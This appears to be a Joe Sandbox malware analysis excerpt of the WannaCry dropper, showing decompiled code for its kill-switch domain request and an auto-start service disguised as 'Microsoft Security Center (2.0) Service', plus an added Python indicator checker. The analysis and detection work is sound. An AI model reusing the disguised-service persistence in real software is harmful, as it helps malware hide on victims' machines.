	intOrPtr* _v120;
	intOrPtr _v124;
	void* _t27;
	intOrPtr _t36;
	signed int _t38;
	int _t40;
	intOrPtr* _t41;
	intOrPtr _t42;
	intOrPtr _t49;
	intOrPtr* _t55;
	intOrPtr _t58;
	intOrPtr _t61;

	_push(0xffffffff);
	_push(0x40a1a0);
	_push(0x409ba2);
	_push( *[fs:0x0]);
	 *[fs:0x0] = _t58;
	_v28 = _t58 - 0x68;
	_v8 = 0;
	__set_app_type(2);
	 *0x70f894 =  *0x70f894 | 0xffffffff;
	 *0x70f898 =  *0x70f898 | 0xffffffff;
	 *(__p__fmode()) =  *0x70f88c;
	 *(__p__commode()) =  *0x70f888;
	 *0x70f890 = _adjust_fdiv;
	_t27 = E00409BA1( *_adjust_fdiv);
	_t61 =  *0x431410; // 0x1
	if(_t61 == 0) {
		__setusermatherr(E00409B9E);
	}
	E00409B8C(_t27);
	_push(0x40b010);
	_push(0x40b00c);
	L00409B86();
	_v112 =  *0x70f884;
	__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
	_push(0x40b008);
	_push(0x40b000); // executed
	L00409B86(); // executed
	_t55 =  *_acmdln;
	_v120 = _t55;
	if( *_t55 != 0x22) {
		while( *_t55 > 0x20) {
			_t55 = _t55 + 1;
			_v120 = _t55;
		}
	} else {
		do {
			_t55 = _t55 + 1;
			_v120 = _t55;
			_t42 =  *_t55;
		} while (_t42 != 0 && _t42 != 0x22);
		if( *_t55 == 0x22) {
			L6:
			_t55 = _t55 + 1;
			_v120 = _t55;
		}
	}
	_t36 =  *_t55;
	if(_t36 != 0 && _t36 <= 0x20) {
		goto L6;
	}
	_v96.dwFlags = 0;
	GetStartupInfoA( &_v96);
	if((_v96.dwFlags & 0x00000001) == 0) {
		_t38 = 0xa;
	} else {
		_t38 = _v96.wShowWindow & 0x0000ffff;
	}
	_push(_t38);
	_push(_t55);
	_push(0);
	_push(GetModuleHandleA(0));
	_t40 = E00408140();
	_v108 = _t40;
	exit(_t40); // executed
	_t41 = _v24;
	_t49 =  *((intOrPtr*)( *_t41));
	_v124 = _t49;
	_push(_t41);
	_push(_t49);
	L00409B80();
	return _t41;
}

                                                                                                                                                0x00409b13
                                                                                                                                                0x00409b1a
                                                                                                                                                0x00409b24
                                                                                                                                                0x00409b39
                                                                                                                                                0x00409b26
                                                                                                                                                0x00409b26
                                                                                                                                                0x00409b26
                                                                                                                                                0x00409b3a
                                                                                                                                                0x00409b3b
                                                                                                                                                0x00409b3c
                                                                                                                                                0x00409b44
                                                                                                                                                0x00409b45
                                                                                                                                                0x00409b4a
                                                                                                                                                0x00409b4e
                                                                                                                                                0x00409b54
                                                                                                                                                0x00409b59
                                                                                                                                                0x00409b5b
                                                                                                                                                0x00409b5e
                                                                                                                                                0x00409b5f
                                                                                                                                                0x00409b60
                                                                                                                                                0x00409b67

APIs
Memory Dump Source
• Source File: 00000008.00000002.348323466.0000000000409000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.348172576.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348205841.0000000000401000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348364015.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348385493.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348635063.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.350875392.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.350892977.0000000000A6C000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.350925815.0000000000A71000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
• String ID:
• API String ID: 801014965-0
• Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
• Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
• Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
• Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 92%
E00408140() {
    char* _v1;
    char* _v3;
    char* _v7;
    char* _v11;
    char* _v15;
    char* _v19;
    char* _v23;
    void _v80;
    char _v100;
    char* _t12;
    void* _t13;
    void* _t27;

    // Copies the 56-character URL into a stack buffer: 14 dwords (0xe << 2 = 56 bytes) via memcpy,
    // then the terminating NUL via the trailing movsb
    _t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
    asm("movsb");
    _v23 = _t12;
    _v19 = _t12;
    _v15 = _t12;
    _v11 = _t12;
    _v7 = _t12;
    _v3 = _t12;
    _v1 = _t12;
    // InternetOpenA(agent, access type 1 = INTERNET_OPEN_TYPE_DIRECT, proxy, proxy bypass, flags)
    _t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
    _t27 = _t13;
    // Requests the URL above; 0x84000000 = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE.
    // The handle it returns is not tested anywhere in this decompiled listing.
    InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
    InternetCloseHandle(_t27); // executed
    InternetCloseHandle(0);
    // Subcall 00408090 retrieves the module path with GetModuleFileNameA and reads __p___argc (see the APIs list for this function)
    E00408090();
    return 0;
}

Line addresses for the listing above (one per decompiled line, in listing order): 0x00408155 0x00408157 0x00408158 0x0040815c 0x00408160 0x00408164 0x00408168 0x0040816c 0x00408177 0x0040817b 0x0040818e 0x00408194 0x004081a7 0x004081ab 0x004081ad 0x004081b9

APIs
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
• InternetCloseHandle.WININET(00000000), ref: 004081A7
• InternetCloseHandle.WININET(00000000), ref: 004081AB
  • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
  • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
Strings
• http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
Memory Dump Source
• Source File: 00000008.00000002.348205841.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000008.00000002.348172576.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348323466.0000000000409000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348364015.000000000040A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348385493.000000000040B000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348635063.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.350875392.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.350892977.0000000000A6C000.00000080.00000001.01000000.00000004.sdmp
• Associated: 00000008.00000002.350925815.0000000000A71000.00000040.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
Yara matches
Similarity
• API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
• String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
• API String ID: 774561529-2942426231
• Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
• Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
• Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
• Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph

C-Code - Quality: 100%
E00407C40() {
    char _v260;
    void* _t15;
    void* _t17;

    // Builds the service command line "<module path> -m security"; 0x70f760 is the buffer that
    // GetModuleFileNameA fills in function 00408090 (see its API reference above)
    sprintf( &_v260, "%s -m security", 0x70f760);
    // 0xF003F = SC_MANAGER_ALL_ACCESS
    _t15 = OpenSCManagerA(0, 0, 0xf003f);
    if(_t15 == 0) {
        return 0;
    } else {
        // 0xF01FF = SERVICE_ALL_ACCESS, 0x10 = SERVICE_WIN32_OWN_PROCESS, 2 = SERVICE_AUTO_START, 1 = SERVICE_ERROR_NORMAL;
        // the service name "mssecsvc2.0" and its display name are the persistence indicators for this sample
        _t17 = CreateServiceA(_t15, "mssecsvc2.0", "Microsoft Security Center (2.0) Service", 0xf01ff, 0x10, 2, 1,  &_v260, 0, 0, 0, 0, 0);
        if(_t17 != 0) {
            StartServiceA(_t17, 0, 0);
            CloseServiceHandle(_t17);
        }
        CloseServiceHandle(_t15);
        return 0;
    }
}

Line addresses for the listing above (one per decompiled line, in listing order): 0x00407c56 0x00407c6e 0x00407c72 0x00407cd3 0x00407c74 0x00407ca7 0x00407cab 0x00407cb2 0x00407cb9 0x00407cb9 0x00407cbc 0x00407cc9 0x00407cc9

                                                                                                                                                APIs
                                                                                                                                                • sprintf.MSVCRT ref: 00407C56
                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 00407C68
                                                                                                                                                • CreateServiceA.ADVAPI32(00000000,mssecsvc2.0,Microsoft Security Center (2.0) Service,000F01FF,00000010,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000,6F61FB10,00000000), ref: 00407C9B
                                                                                                                                                • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 00407CB2
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CB9
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 00407CBC
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.348205841.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 00000008.00000002.348172576.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348323466.0000000000409000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348364015.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348385493.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348635063.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.350875392.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.350892977.0000000000A6C000.00000080.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.350925815.0000000000A71000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandle$CreateManagerOpenStartsprintf
                                                                                                                                                • String ID: %s -m security$Microsoft Security Center (2.0) Service$mssecsvc2.0
                                                                                                                                                • API String ID: 3340711343-4063779371
                                                                                                                                                • Opcode ID: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                                                                                • Instruction ID: 2288e5cc66680fabefb91112cf05624c6df81315eb9d87428618c258e2ee617f
                                                                                                                                                • Opcode Fuzzy Hash: c3592d809756ac94f014d34e1e4fa0c14de5620095203194e3f9233ad68c92ee
                                                                                                                                                • Instruction Fuzzy Hash: AD01D1717C43043BF2305B149D8BFEB3658AB84F01F500025FB44B92D0DAF9A81491AF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                Control-flow Graph

                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                 			E00408090() {
                                                                                                                                                 				char* _v4;
                                                                                                                                                 				char* _v8;
                                                                                                                                                 				intOrPtr _v12;
                                                                                                                                                 				struct _SERVICE_TABLE_ENTRY _v16;
                                                                                                                                                 				long _t6;
                                                                                                                                                 				int* _t8;    /* pointer to argc, as returned by __p___argc() */
                                                                                                                                                 				void* _t19;
                                                                                                                                                 				void* _t22;
                                                                                                                                                 				intOrPtr _t26;
                                                                                                                                                 
                                                                                                                                                 				/* Own executable path into the global buffer at 0x70f760 (0x104 = MAX_PATH). */
                                                                                                                                                 				_t6 = GetModuleFileNameA(0, 0x70f760, 0x104);
                                                                                                                                                 				/* The decompiler reused _t6 for the argc pointer; the comparison below is on argc,
                                                                                                                                                 				   not on the GetModuleFileNameA return value. */
                                                                                                                                                 				_t8 = __imp____p___argc();
                                                                                                                                                 				_t26 =  *_t8 - 2;
                                                                                                                                                 				if( *_t8 >= 2) {
                                                                                                                                                 					/* Started with arguments: the service instance (the service is registered with a
                                                                                                                                                 					   "%s -m security" command line, so it always starts this way).
                                                                                                                                                 					   0xf003f = SC_MANAGER_ALL_ACCESS, 0xf01ff = SERVICE_ALL_ACCESS. */
                                                                                                                                                 					_t19 = OpenSCManagerA(0, 0, 0xf003f);
                                                                                                                                                 					__eflags = _t19;
                                                                                                                                                 					if(_t19 != 0) {
                                                                                                                                                 						_t22 = OpenServiceA(_t19, "mssecsvc2.0", 0xf01ff);
                                                                                                                                                 						__eflags = _t22;
                                                                                                                                                 						if(_t22 != 0) {
                                                                                                                                                 							/* E00407FA0 is not shown on this page; it receives the service handle and 60. */
                                                                                                                                                 							E00407FA0(_t22, 0x3c);
                                                                                                                                                 							CloseServiceHandle(_t22);
                                                                                                                                                 						}
                                                                                                                                                 						CloseServiceHandle(_t19);
                                                                                                                                                 					}
                                                                                                                                                 					/* SERVICE_TABLE_ENTRY[2]: {"mssecsvc2.0", ServiceMain at 0x408000}, {NULL, NULL}.
                                                                                                                                                 					   StartServiceCtrlDispatcherA hands control to the service main on the SCM's thread. */
                                                                                                                                                 					_v16 = "mssecsvc2.0";
                                                                                                                                                 					_v12 = 0x408000;
                                                                                                                                                 					_v8 = 0;
                                                                                                                                                 					_v4 = 0;
                                                                                                                                                 					return StartServiceCtrlDispatcherA( &_v16);
                                                                                                                                                 				} else {
                                                                                                                                                 					/* Started without arguments: the non-service path (E00407F20, not shown on this page). */
                                                                                                                                                 					return E00407F20(_t26);
                                                                                                                                                 				}
                                                                                                                                                 			}










                                                                                                                                                 Line addresses: 0x0040809f 0x004080a5 0x004080ab 0x004080ae 0x004080c9 0x004080cb 0x004080cd 0x004080e8 0x004080ea 0x004080ec 0x004080f1 0x004080fa 0x004080fa 0x004080fd 0x00408100 0x00408105 0x0040810e 0x00408116 0x0040811e 0x00408130 0x004080b0 0x004080b8 0x004080b8

                                                                                                                                                APIs
                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                                                                                                                                                • __p___argc.MSVCRT ref: 004080A5
                                                                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,?,004081B2), ref: 004080C3
                                                                                                                                                • OpenServiceA.ADVAPI32(00000000,mssecsvc2.0,000F01FF,6F61FB10,00000000,?,004081B2), ref: 004080DC
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,004081B2), ref: 004080FA
                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,004081B2), ref: 004080FD
                                                                                                                                                • StartServiceCtrlDispatcherA.ADVAPI32(?,?,?), ref: 00408126
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000008.00000002.348205841.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                 • Associated: 00000008.00000002.348172576.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348323466.0000000000409000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348364015.000000000040A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348385493.000000000040B000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348414559.000000000040F000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348635063.0000000000431000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.348690021.0000000000710000.00000080.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.350875392.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.350892977.0000000000A6C000.00000080.00000001.01000000.00000004.sdmp
                                                                                                                                                 • Associated: 00000008.00000002.350925815.0000000000A71000.00000040.00000001.01000000.00000004.sdmp
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_8_2_400000_mssecsvc.jbxd
                                                                                                                                                Yara matches
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Service$CloseHandleOpen$CtrlDispatcherFileManagerModuleNameStart__p___argc
                                                                                                                                                • String ID: mssecsvc2.0
                                                                                                                                                • API String ID: 4274534310-3729025388
                                                                                                                                                • Opcode ID: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                                                                                • Instruction ID: 0eddf8d8cc97b5ba853ece0b0f9ce4fe0dc31dc3004373c78c05f92e851b2f94
                                                                                                                                                • Opcode Fuzzy Hash: 14f2d0f9cf239aa653f070f930b60ae04978eb0b591616557438e437b3700a6a
                                                                                                                                                • Instruction Fuzzy Hash: 4A014775640315BBE3117F149E4AF6F3AA4EF80B19F404429F544762D2DFB888188AAF
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%
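                                                                                                                                                 The two decompiled functions above describe one persistence mechanism: the first registers "mssecsvc2.0" (display name "Microsoft Security Center (2.0) Service", type 0x10 = SERVICE_WIN32_OWN_PROCESS, start 0x2 = SERVICE_AUTO_START, ImagePath formatted from "%s -m security") and starts it; E00408090 then treats "started with arguments" as "run as that service". The following is an added example, not code from the Joe Sandbox report or from the sample, that checks service configuration records against exactly those indicators. The ServiceRecord layout mirrors the per-service registry values (DisplayName, ImagePath, Type, Start) but is an assumption of this example, and the sample records are constructed.

```python
"""Offline check of service configuration records against the indicators in
the decompiled CreateServiceA call above (added example; record layout and
sample data are constructed, not taken from the report)."""
from __future__ import annotations

from dataclasses import dataclass

SERVICE_WIN32_OWN_PROCESS = 0x00000010  # dwServiceType passed to CreateServiceA above
SERVICE_AUTO_START = 0x00000002         # dwStartType passed to CreateServiceA above

WANNACRY_SERVICE_NAME = "mssecsvc2.0"
WANNACRY_DISPLAY_NAME = "Microsoft Security Center (2.0) Service"
WANNACRY_ARGS = ["-m", "security"]      # from the "%s -m security" format string


@dataclass(frozen=True)
class ServiceRecord:
    """Assumed layout: the values a service keeps under its registry key."""
    name: str
    display_name: str
    image_path: str
    service_type: int
    start_type: int


def split_image_path(image_path: str) -> tuple[str, list[str]]:
    """Split an ImagePath into (executable, arguments).

    A quoted path ends at the closing quote. For an unquoted path the
    executable is taken to extend up to the first switch-like token
    ("-x" or "/x"), which is the shape sprintf("%s -m security", exe)
    produces; a plain whitespace split would truncate an unquoted path
    that contains spaces.
    """
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        if end == -1:                       # unterminated quote: all of it is the path
            return s[1:], []
        return s[1:end], s[end + 1:].split()
    tokens = s.split()
    for i, tok in enumerate(tokens[1:], start=1):
        if tok[:1] in ("-", "/"):
            return " ".join(tokens[:i]), tokens[i:]
    return s, []


def match_indicators(rec: ServiceRecord) -> list[str]:
    """Return the indicators this record matches; empty means no match."""
    hits: list[str] = []
    _exe, args = split_image_path(rec.image_path)
    if rec.name.lower() == WANNACRY_SERVICE_NAME:
        hits.append("name=mssecsvc2.0")
    if rec.display_name == WANNACRY_DISPLAY_NAME:
        hits.append("display=Microsoft Security Center (2.0) Service")
    if [a.lower() for a in args] == WANNACRY_ARGS:
        hits.append("args=-m security")
    # Own-process auto-start is common on its own; report it only as corroboration.
    if hits and (rec.service_type, rec.start_type) == (
            SERVICE_WIN32_OWN_PROCESS, SERVICE_AUTO_START):
        hits.append("own-process auto-start")
    return hits


def scan(records: list[ServiceRecord]) -> dict[str, list[str]]:
    """Map service name -> matched indicators for every record that matched."""
    result: dict[str, list[str]] = {}
    for rec in records:
        hits = match_indicators(rec)
        if hits:
            result[rec.name] = hits
    return result


# Constructed sample data: the exact values from the CreateServiceA call, a
# benign service, and a renamed variant that keeps the display name and the
# "-m security" argument so the name check alone would miss it.
SAMPLE_SERVICES = [
    ServiceRecord("mssecsvc2.0", "Microsoft Security Center (2.0) Service",
                  r"C:\WINDOWS\mssecsvc.exe -m security", 0x10, 0x2),
    ServiceRecord("wuauserv", "Windows Update",
                  r"C:\WINDOWS\system32\svchost.exe -k netsvcs", 0x20, 0x3),
    ServiceRecord("SecCenter2", "Microsoft Security Center (2.0) Service",
                  r'"C:\Program Files\Common\update.exe" -m security', 0x10, 0x2),
]

if __name__ == "__main__":
    for name, hits in scan(SAMPLE_SERVICES).items():
        print(f"{name}: {', '.join(hits)}")
```

                                                                                                                                                 The argument check matters as much as the name: E00408090 branches purely on argc, so any copy of the binary registered under a different service name still has to be started with arguments, and the "%s -m security" format string fixes what those arguments are.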

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:58.7%
                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                Signature Coverage:0%
                                                                                                                                                Total number of Nodes:7
                                                                                                                                                Total number of Limit Nodes:1

                                                                                                                                                Callgraph

                                                                                                                                                 callgraph (nodes and call edges, textual form of the graph image)
                                                                                                                                                 • 0 Function_00409BA1
                                                                                                                                                 • 1 Function_00A6B0B4
                                                                                                                                                 • 2 Function_00409A16 -> 0, 1, 3
                                                                                                                                                 • 3 Function_00409B8C
                                                                                                                                                 • 4 Function_00409B9E

                                                                                                                                                Control-flow Graph

                                                                                                                                                 control_flow_graph (basic blocks and edges, textual form of the graph image; the flow leaves the 0x409xxx image range at block 14 into 0xa6bxxx)
                                                                                                                                                 • 0 409a16-409a8b __set_app_type __p__fmode __p__commode call 409ba1 -> 3, 4
                                                                                                                                                 • 4 409a8d-409a98 __setusermatherr -> 3
                                                                                                                                                 • 3 409a99-409af0 call 409b8c _initterm __getmainargs _initterm -> 7, 8
                                                                                                                                                 • 7 409af2-409afa -> 11, 12
                                                                                                                                                 • 12 409afc-409afe -> 7, 11
                                                                                                                                                 • 11 409b00-409b03 -> 10, 13
                                                                                                                                                 • 13 409b05-409b06 -> 10
                                                                                                                                                 • 10 409b09-409b0d -> 14, 15
                                                                                                                                                 • 15 409b0f-409b11 -> 13, 14
                                                                                                                                                 • 8 409b2c-409b2f -> 9, 10
                                                                                                                                                 • 9 409b31-409b35 -> 8
                                                                                                                                                 • 14 409b13-a6b300 -> 17
                                                                                                                                                 • 17 a6b304 -> 17, 18
                                                                                                                                                 • 18 a6b306-a6b30e call a6b0b4 -> 20
                                                                                                                                                 • 20 a6b313 -> 21
                                                                                                                                                 • 21 a6b314-a6b316 -> 21, 22
                                                                                                                                                 • 22 a6b318-a6b326 -> 20, 23
                                                                                                                                                 • 23 a6b32c-a6b332 -> 20, 24
                                                                                                                                                 • 24 a6b334-a6b349 -> 20, 25
                                                                                                                                                 • 25 a6b34b-a6b34e
                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                			_entry_(void* __ebx, char* __edx, void* _a37) {
                                                                                                                                                				char* _v8;
                                                                                                                                                				intOrPtr _v28;
                                                                                                                                                				char* _v52;
                                                                                                                                                				intOrPtr _v84;
                                                                                                                                                				char _v96;
                                                                                                                                                				int _v100;
                                                                                                                                                				char** _v104;
                                                                                                                                                				intOrPtr _v108;
                                                                                                                                                				void _v112;
                                                                                                                                                				char** _v116;
                                                                                                                                                				intOrPtr* _v120;
                                                                                                                                                				void* _v136;
                                                                                                                                                				short _v152;
                                                                                                                                                				char _v184;
                                                                                                                                                				void* __esi;
                                                                                                                                                				void* __ebp;
                                                                                                                                                				void* _t37;
                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                				char* _t47;
                                                                                                                                                				int _t50;
                                                                                                                                                				void* _t52;
                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                				intOrPtr _t54;
                                                                                                                                                				intOrPtr _t58;
                                                                                                                                                				void* _t61;
                                                                                                                                                				void* _t66;
                                                                                                                                                				void* _t67;
                                                                                                                                                				void* _t68;
                                                                                                                                                				char* _t71;
                                                                                                                                                				void* _t74;
                                                                                                                                                				intOrPtr* _t79;
                                                                                                                                                				intOrPtr _t84;
                                                                                                                                                				intOrPtr _t85;
                                                                                                                                                				intOrPtr* _t86;
                                                                                                                                                				void* _t88;
                                                                                                                                                				intOrPtr _t90;
                                                                                                                                                				void* _t98;
                                                                                                                                                				void* _t101;
                                                                                                                                                
                                                                                                                                                				_t71 = __edx;
                                                                                                                                                				_push(0xffffffff);
                                                                                                                                                				_push(0x40a1a0);
                                                                                                                                                				_push(0x409ba2);
                                                                                                                                                				_push( *[fs:0x0]);
                                                                                                                                                				 *[fs:0x0] = _t84;
                                                                                                                                                				_t85 = _t84 - 0x68;
                                                                                                                                                				_push(__ebx);
                                                                                                                                                				_push(_t74);
                                                                                                                                                				_v28 = _t85;
                                                                                                                                                				_v8 = 0;
                                                                                                                                                				__set_app_type(2);
                                                                                                                                                				 *0x70f894 =  *0x70f894 | 0xffffffff;
                                                                                                                                                				 *0x70f898 =  *0x70f898 | 0xffffffff;
                                                                                                                                                				 *(__p__fmode()) =  *0x70f88c;
                                                                                                                                                				 *(__p__commode()) =  *0x70f888;
                                                                                                                                                				 *0x70f890 = _adjust_fdiv;
                                                                                                                                                				_t37 = E00409BA1( *_adjust_fdiv);
                                                                                                                                                				_t90 =  *0x431410; // 0x1
                                                                                                                                                				if(_t90 == 0) {
                                                                                                                                                					__setusermatherr(E00409B9E);
                                                                                                                                                				}
                                                                                                                                                				E00409B8C(_t37);
                                                                                                                                                				_push(0x40b010);
                                                                                                                                                				_push(0x40b00c);
                                                                                                                                                				L00409B86();
                                                                                                                                                				_v112 =  *0x70f884;
                                                                                                                                                				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
                                                                                                                                                				_push(0x40b008);
                                                                                                                                                				_push(0x40b000); // executed
                                                                                                                                                				L00409B86(); // executed
                                                                                                                                                				_t86 = _t85 + 0x24;
                                                                                                                                                				_t79 =  *_acmdln;
                                                                                                                                                				_v120 = _t79;
                                                                                                                                                				if( *_t79 != 0x22) {
                                                                                                                                                					while( *_t79 > 0x20) {
                                                                                                                                                						_t79 = _t79 + 1;
                                                                                                                                                						_v120 = _t79;
                                                                                                                                                					}
                                                                                                                                                				} else {
                                                                                                                                                					do {
                                                                                                                                                						_t79 = _t79 + 1;
                                                                                                                                                						_v120 = _t79;
                                                                                                                                                						_t58 =  *_t79;
                                                                                                                                                					} while (_t58 != 0 && _t58 != 0x22);
                                                                                                                                                					if( *_t79 == 0x22) {
                                                                                                                                                						L6:
                                                                                                                                                						_t79 = _t79 + 1;
                                                                                                                                                						_v120 = _t79;
                                                                                                                                                					}
                                                                                                                                                				}
                                                                                                                                                				_t46 =  *_t79;
                                                                                                                                                				if(_t46 != 0 && _t46 <= 0x20) {
                                                                                                                                                					goto L6;
                                                                                                                                                				}
                                                                                                                                                				_v52 = 0;
                                                                                                                                                				_t47 =  &_v96;
                                                                                                                                                				_push(_t47);
                                                                                                                                                				_t98 =  *_t86 - 0xfffffffe;
                                                                                                                                                				do {
                                                                                                                                                				} while (_t98 > 0);
                                                                                                                                                				asm("pushad");
                                                                                                                                                				_t88 =  &_v184 - 0xffffffdc;
                                                                                                                                                				E00A6B0B4();
                                                                                                                                                				goto L24;
                                                                                                                                                				do {
                                                                                                                                                					do {
                                                                                                                                                						do {
                                                                                                                                                							L24:
                                                                                                                                                							_t61 = 0xffffffffffffffff;
                                                                                                                                                							do {
                                                                                                                                                								_t61 = _t61 - 1;
                                                                                                                                                							} while (_t61 != 0);
                                                                                                                                                							_t79 = _t79 - 1;
                                                                                                                                                							_t71 = _t71 - 1;
                                                                                                                                                							_t74 = _t74 + 1;
                                                                                                                                                							_t47 = _t47 - 1;
                                                                                                                                                							_t66 =  *((intOrPtr*)(_t61 + 0x3c));
                                                                                                                                                							_t67 = _t66 - 0x7ffffffd;
                                                                                                                                                							_t101 = _t67;
